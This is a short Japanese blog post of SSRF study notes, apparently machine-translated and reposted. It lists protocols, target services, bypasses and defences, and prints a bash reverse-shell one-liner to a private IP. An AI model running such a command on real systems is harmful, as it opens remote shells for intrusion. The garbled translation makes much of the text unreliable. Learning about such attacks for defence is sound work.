2019年11月28日:SSRFベースの学習、ノート

SSRFサーバー側リクエストフォージェリの
SSRFは、通常の状況下では、悪質な訪問者の設定により、サーバによる要求を開始したセキュリティ侵害を形成する方法であって、それは公式のサーバー作られているので、ネットワークの外部からの目標SSRFアクセス内部システムは、アクセスできませんそれは、サーバが他のサーバアプリケーションからデータを取得する機能を提供するため、主に形成されたSSRF理由から内部ネットワークの分離に接続されているシステムに要求することができ、フィルタリング対象アドレスを限定するものではないので、そのような指定からように、開始WebページのURLアドレスを指定したアドレスの画像、ダウンロードをロードして、より多くの、テキストの内容を取得します

使用SSRF
PHPのプロトコルは、ソースファイルのニーズのfile_get_contents読み
のGopher爆弾シェル
内部のdictネットワークサービス
、ファイルサーバーのファイルが現在の読み
HTTP / SアクセスするWebサービスのネットワークをhttpプロトコルを使用して、HTTPリクエストを行いました

SSRF攻撃アプリケーション
Redisの
清華
FastCGIの
イントラネットアプリケーション
のmemcache

バイパス
URL混乱
小数に変換し、IPを

防衛
のみ、HTTP、HTTPSプロトコルは、プロトコルに制限
禁止されているスキップ30は
、単一の明るい白または制限URLネットワークのIP内に設けられています

リバウンドシェル:指定された場所に爆弾のターゲットターミナルサーバー、およびシェルをポップし、現在の環境について、Apacheなどのサービスをシェルアップポップを使用してASに注意を払うの必要性は、WWWの権威であります

命令のbin / bashの-i>&/dev/tcp/192.168.63.128/7999 0>&1

crontabの-l現在のタスクを表示する
のcrontab -e追加タスクが
-r削除タスクのcrontab

Linuxのスケジュールされたタスクの
分:時:日:月:週:コマンドは
、それがで示されていません*

おすすめ

転載: www.cnblogs.com/sym945/p/11955543.html